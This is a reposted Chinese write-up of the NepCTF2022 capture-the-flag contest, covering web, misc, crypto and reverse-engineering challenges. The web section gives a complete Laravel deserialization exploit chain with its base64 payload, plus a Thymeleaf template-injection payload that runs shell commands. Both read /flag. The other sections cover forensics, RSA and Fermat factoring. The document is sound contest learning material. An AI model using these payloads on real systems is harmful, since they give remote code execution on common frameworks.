當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

[CTF]-NepCTF2022

發布時間：2023/12/16 编程问答 29 豆豆

生活随笔收集整理的這篇文章主要介紹了 [CTF]-NepCTF2022 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

[CTF]-NepCTF2022

web
- Just Kidding
- Challenger
Misc
- 簽到
- 花花畫畫畫花花
- 餡餅？陷阱！
- 9點直播
- 少見的base
- 原來你也玩智能家居
- DoubleHappiness
Crypto
- sinin
- 中學數學
Re
- 簽到

web

Just Kidding

掃目錄有 www.zip

下載得到源碼代碼審計

//App\Http\Controllers\HelloController.phpclass HelloController extends Controller {public function hello(\Illuminate\Http\Request $request){$h3 = base64_decode($request->input("h3"));unserialize($h3);return "Welcome Nepctf! GL&HF";}}

發現這個 php 文件中有一個反序列化的函數，存在反序列化漏洞

查找 __destruct() 方法
跟進 src/Illuminate/Broadcasting/PendingBroadcast.php 中的 __destruct 方法, 可以看到這里的 $this->events 和 $this->event 均為可控的, 尋找可用的 dispatch 方法

... public function __destruct(){$this->events->dispatch($this->event);}

這里跟進 src/Illuminate/Bus/Dispatcher.php 中的 dispatch 方法, 這里的 $command 和 $this->queueResolver 均是可控的.

跟進 dispatchToQueue 方法, $command 和 $this->queueResolver 均是可控的,

不難看出可以利用該方法中的 call_user_func 方法來進行命令執行的利用.

現在需要解決的就是命令執行的語句, 注意到上圖中的代碼 $connection = $command->connection ?? null;

這里可以通過 src/Illuminate/Broadcasting/BroadcastEvent.php 中的類中變量來控制 $connection

從而達到命令執行的目的.

//exp: <?php namespace Illuminate\Contracts\Queue{interface ShouldQueue {} } namespace Illuminate\Bus{class Dispatcher{protected $container;protected $pipeline;protected $pipes = [];protected $handlers = [];protected $queueResolver;function __construct(){$this->queueResolver = "system";}} } namespace Illuminate\Broadcasting{use Illuminate\Contracts\Queue\ShouldQueue;class BroadcastEvent implements ShouldQueue {function __construct() {}}class PendingBroadcast{protected $events;protected $event;function __construct() {$this->event = new BroadcastEvent();$this->event->connection = "cat /flag";$this->events = new \Illuminate\Bus\Dispatcher();}} } namespace {$pop = new \Illuminate\Broadcasting\PendingBroadcast();echo base64_encode(serialize($pop)); }

payload

/hello?h3=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319

Challenger

代碼審計

//關鍵代碼@GetMapping({"/eval"}) public String path(@RequestParam String lang) {return "user/" + lang + "/welcome"; }

利用 Thymeleaf 模板注入

訪問 /eval 目錄

需要 lang 參數

/eval?lang=.....

然后找到 payload

?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7d__::.x

Misc

簽到

套娃 230 多層

┌──(root?kali)-[/home/muz1/桌面] └─# binwalk xxx.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01 33877 0x8455 Zip archive data, at least v1.0 to extract, compressed size: 77532, uncompressed size: 77532, name: 232.zip 111452 0x1B35C End of Zip archive, footer length: 22 111709 0x1B45D End of Zip archive, footer length: 22 ┌──(root?kali)-[/home/muz1/桌面] └─# foremost xxx.jpg Processing: xxx.jpg |foundat=232.zipUT foundat=繼續解壓呀 UT *|

偽加密，改字段值

解壓出一個流量包

然后用 tshark 提取

tshark.exe -r .\keyboard.pcap -T fields -e usb.capdata > usbdata.txt 0000110000000000 0000000000000000 0000080000000000 0000000000000000 0000130000000000 0000000000000000 0000060000000000 0000000000000000 0000170000000000 0000000000000000 0000090000000000 0000000000000000 0200000000000000 02002f0000000000 0200000000000000 0000000000000000 00001a0000000000 00001a0800000000 0000080000000000 0000000000000000 00000f0000000000 0000000000000000 0000060000000000 0000000000000000 0000120000000000 0000121000000000 0000100000000000 0000000000000000 0000080000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 0000170000000000 0000120000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 0000110000000000 0000000000000000 0000080000000000 0000000000000000 0000130000000000 0000000000000000 0000060000000000 0000000000000000 0000170000000000 0000000000000000 0000090000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 00001f0000000000 0000000000000000 0000110000000000 0000000000000000 0000070000000000 0000000000000000 0200000000000000 0200300000000000 0200000000000000 0000000000000000 0000280000000000 0000000000000000

轉一下格式

f = open('data.txt', 'r', encoding='utf-16') fi = open('out.txt', 'w', encoding='utf-16') while 1:a = f.readline().strip()if a:if len(a) == 16: # 鼠標流量的話 len 改為 8out = ''for i in range(0, len(a), 2):if i + 2 != len(a):out += a[i] + a[i + 1] + ":"else:out += a[i] + a[i + 1]fi.write(out)fi.write('\n')else:breakfi.close()

然后提取關鍵信息

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e","09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j","0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o","13":"p", "14":"q", "15":"r", "16":"s", "17":"t","18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y","1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4","22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"} shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E","09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J","0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O","13":"P", "14":"Q", "15":"R", "16":"S", "17":"T","18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y","1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$","22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"} output = [] keys = open('out.txt','r',encoding='utf-16') for line in keys:try:if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":continueif line[6:8] in normalKeys.keys():output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']else:output += ['[unknown]']except:pass keys.close() flag=0 print("".join(output)) for i in range(len(output)):try:a=output.index('<DEL>')del output[a]del output[a-1]except:pass for i in range(len(output)):try:if output[i]=="<CAP>":flag+=1output.pop(i)if flag==2:flag=0if flag!=0:output[i]=output[i].upper()except:pass print ('output :' + "".join(output)) output :nepctf{welcometonepctf2nd}<RET>nepctf{welcome_to_nepctf_2nd}

花花畫畫畫花花

osu 文件推測為音游 osu

安裝后將該文件夾放入到歌曲目錄即可進行挑戰或編輯

NepCTF{MASTER_OF_壞女人！}

餡餅？陷阱！

瓊 -> 海南

谷歌地圖定位海南

搜索如家酒店

中國光大銀行NepCTF{www.cebbank.com}

9點直播

直播間福利

少見的base

010查看沒東西

binwalk沒東西

┌──(root?kali)-[~/桌面] └─# binwalk bbbbase.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01

嘗試到了 Jphswin

選擇文件 --> seek --> 無密碼 --> 保存文件

010打開 --> 解碼

flag{Real_qiandao~}

原來你也玩智能家居

admin / admin 登錄

首頁看見切換按鈕

這里就可以利用MQTT的通配符特性來捕獲cmnd下所有的數據，即cmnd/#

點擊切換按鈕

DoubleHappiness

用 Honeyview 打開

點擊GPS

查找附近的門店
找到附近的瑞星咖啡店為瑞幸咖啡(蓮花商務中心店)

上美團外賣APP上找到這家店鋪，查看評論區中日期為7月13日的評論

微博搜索 Tr0jAn-

果然沒錯，就是這小子。可以看到最新的一條微博發了一張寶石山俯瞰西湖夜景圖，在圖片右下角水印處有馬賽克，隱隱約約可以看出有NepCTF字樣。

可以把這個馬賽克先摳出來

再使用unRedacter工具來破解，需要注意的是，摳出來的馬賽克要調整一下比例(304x40)，還要在字典里添加大寫英文字母、數字以及下劃線

NepCTF{ti_0d_nAj0r}

Crypto

sinin

yafu分解 N

P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901 P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891

得到 p 和 q，然后和 c_mod_q c_mod_p 一起運算得到c

# 求兩個數的最大公約數gcd函數 def gcd(a, b):if b == 0:return aelse:return gcd(b, a % b)# 判斷一個列表任意兩個數是否兩兩互質def compare(list):for i in range(0, len(list)):flag = 1for j in range(i + 1, len(list)):if gcd(list[i], list[j]) != 1:print('不能直接使用中國剩余定理！')exit()# 如果滿足條件，就會繼續執行，否則退出程序# 求出輸入的m1,m2,..,mk 的乘積m def product_m(list):m = 1for i in list:m *= ireturn m# 求M1,M2,..,MK 的值 Mj = m / mj 并返回一個名為shang的列表 def get_divsion(list, m):div = []for i in list:div.append(m // i)return divdef get_inverse(a, m): # 求一個數a 的逆再模m 的值這個函數返回的是一個值不是列表if gcd(a, m) != 1:return Noneu1, u2, u3 = 1, 0, av1, v2, v3 = 0, 1, mwhile v3 != 0:q = u3 // v3v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3return u1 % m# 求Xj 算法為：Xj = (M * M_INVERSE * a) % mj def get_x(M: int, M_inverse: int, a: int, m: int):product_x = (M * M_inverse * a) % mreturn product_x# 算出最終答案X = X1+X2+...Xk def get_solution(list_m, list_a):# compare(list_m)m = product_m(list_m)list_M = get_divsion(list_m, m)list_M_inverse = []list_X = []total = 0for i in range(0, len(list_M)):list_M_inverse.append(get_inverse(list_M[i], list_m[i]))for i in range(len(list_M)):list_X.append(get_x(list_M[i], list_M_inverse[i], list_a[i], m))for x in list_X:total += xreturn total % m # 測試數據 list_m = [141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901,141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891] list_a = [32087476819370469840242617415402189007173583393431940289526096277088796498999849060235750455260897143027010566292541554247738211165214410052782944239055659645055068913404216441100218886028415095562520911677409842046139862877354601487378542714918065194110094824176055917454013488494374453496445104680546085816,59525076096565721328350936302014853798695106815890830036017737946936659488345231377005951566231961079087016626410792549096788255680730275579842963019533111895111371299157077454009624496993522735647049730706272867590368692485377454608513865895352910757518148630781337674813729235453169946609851250274688614922] print(get_solution(list_m, list_a))# 調用get_solution()函數即可使用中國剩余定理 # get_solution()函數要傳入得是兩個列表list_a,list_m # 讀取與輸入list_a,list_m;并將其變為整型的數據在

帶入之后得到c ，然后繼續代碼

from Crypto.Util.number import long_to_bytes def fast_power(base, power, MOD):result = 1while power > 0:# If power is oddif power % 2 == 1:result = (result * base) % MOD# Divide the power by 2power = power // 2# Multiply base to itselfbase = (base * base) % MODreturn result def gcd(a, b):while a != 0:a, b = b % a, areturn b # calc : b^(-1) mod m def findModeInverse(b, m, show=True):if gcd(m, b) != 1:return NoneA1, A2, A3 = 1, 0, mB1, B2, B3 = 0, 1, bif show:print('-' * 54)print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("Q", "A1", "A2", "A3", "B1", "B2", "B3"))print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("-", A1, A2, A3, B1, B2, B3))while True:Q = A3 // B3B1, B2, B3, A1, A2, A3 = (A1 - Q * B1), (A2 - Q * B2), (A3 - Q * B3), B1, B2, B3if show:print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format(Q, A1, A2, A3, B1, B2, B3))if B3 == 0:return Noneelif B3 == 1:breakif show:print("-" * 54)return B2 % m p = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901 q = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891 d = 1252990107815050396131095071106875863839625463162341861437776714252424196867083751438050781152678454544290561348477588314424473974689219719915628330383292496262245806653795391680166551537602119522395725446199697857165189662727850129646294082998077471030893379415607095699225984851603694723276083262879311002929800558428024700747018831268269585502183294987547669372754175415834581968714034535861714455512875208618004858007748676310828573704007774858023825900743373244384093983022857223181677619286464710238287796148593564498619278346936626883260434122906742989245858429095035901635408963549294384055658232382801968473 c = 11585753035364453623378164545833713948934121662572481093551492504984285077422719062455876099192809170965528989978916297975142142402092047776685650391890015591851053625214326683661927557815767412532952834312578481775648269348260126890551800182341487341482624921905494384205411870866282984671167687789838745481283560185866063970417999748309023918055613674098243729965218609202078551918246640314724590879724609275497227193516782920583249761139685192331805838597293957173545581106446048233248746840771791319643962479707861560044363232580020690857525268858245122996322707454824806268698526881569554077998480289824923073346 dp = d % (p-1) dq = d % (q-1) Cp = c % p Cq = c % q a = findModeInverse(q, p, False) # q對p的逆元 : 114 Mp = fast_power(Cp, dp, p) # 102 Mq = fast_power(Cq, dq, q) # 120 b = (a * ((Mp - Mq) % p)) % p c = Mq + b*q print("CRT的解密結果：", c) print(long_to_bytes(c)) NepCTF{ju5t_d0_f4ct_4nd_crt_th3n_d3crypt}

中學數學

from gmpy2 import * # from Crypto.Util.number import * from Crypto import * from secret import *p = getPrime(1024) q = next_prime(p + (p >> 500)) e = 0x10001 n = p * q c = pow(bytes_to_long(flag), e, n) print("n=", n) print("c=", c)''' n= 13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507c= 6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186 '''

根據代碼知道 p 和 q 很接近，但是用了腳本之后并不出
還有費馬定理的 p 和 q 很接近
找個費馬定理的腳本

from Crypto.Util.number import long_to_bytes from gmpy2 import gmpy2c=6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186 n=13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507 e = 0x10001def factor(n):a = gmpy2.iroot(n, 2)[0]while 1:B2 = pow(a, 2) - nif gmpy2.is_square(B2):b = gmpy2.iroot(B2, 2)[0]p = a + bq = a - breturn p, qa += 1 # 千萬別忘了a的自增步長為1p, q = factor(n) f = (p - 1) * (q - 1) d = gmpy2.invert(e, f) print(long_to_bytes(pow(c, d, n)))# b'flag{never_ignore_basic_math}'

Re

簽到

ida 打開修復報錯（改cfg文件和將圖形化設置修改一下）

左下角就是 flag

總結

以上是生活随笔為你收集整理的[CTF]-NepCTF2022的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： Python实现视频流媒体传输
下一篇： t6服务器验证密码失败,用友T6软件T6